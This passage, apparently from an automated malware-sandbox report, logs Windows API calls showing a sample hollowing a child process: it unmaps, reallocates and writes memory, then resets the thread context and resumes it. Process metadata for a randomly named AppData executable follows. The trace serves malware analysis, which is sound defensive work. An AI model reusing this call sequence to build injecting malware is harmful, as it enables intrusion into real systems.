FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, 
[35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, 
[222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, 
[403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0093.597] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0093.598] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0093.598] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0093.598] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x184768*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x184768*, lpNumberOfBytesWritten=0x0) returned 1 [0093.598] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x184b68, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) 
returned 0 [0093.598] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x184b68*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x184b68*, lpNumberOfBytesWritten=0x0) returned 1 [0093.605] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x1d9168*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1d9168*, lpNumberOfBytesWritten=0x0) returned 1 [0093.605] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x18489c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18489c*, lpNumberOfBytesWritten=0x0) returned 1 [0093.605] SetThreadContext (hThread=0x48, lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, 
[192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, 
[373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0093.605] ResumeThread (hThread=0x48) returned 0x1 [0093.605] CloseHandle (hObject=0x48) returned 1 [0093.605] CloseHandle (hObject=0x4c) returned 1 [0093.605] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.606] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0093.606] ExitProcess (uExitCode=0x0) Process: id = "6" image_name = "xey8d7zi.exe" filename = 
"c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe" page_root = "0x7ea16380" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa88" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 412 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 413 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 414 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 415 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "xey8d7zi.exe" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe") Region: id = 416 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 417 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 
418 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 419 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 420 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 421 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 422 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 423 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 424 start_va = 0x670000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 425 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 426 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 427 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 428 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 
"c:\\windows\\system32\\msvcrt.dll") Region: id = 429 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 430 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 431 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 432 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 433 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 434 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 435 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 455 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 456 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 457 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 458 start_va = 0x2e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x00000000002e0000" filename = "" Region: id = 459 start_va = 0x770000 end_va = 0x136ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 484 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 485 start_va = 0x490000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 516 start_va = 0x490000 end_va = 0x56efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 517 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 518 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 519 start_va = 0x1d0000 end_va = 0x1d2fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 520 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Thread: id = 6 os_tid = 0xad0 [0093.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x76a24640, dwHighDateTime=0x1d440a9)) [0093.492] GetCurrentProcessId () returned 0xacc [0093.492] GetCurrentThreadId () returned 0xad0 [0093.492] GetTickCount () returned 0x22ab7 [0093.492] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15028093602) returned 1 [0093.492] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
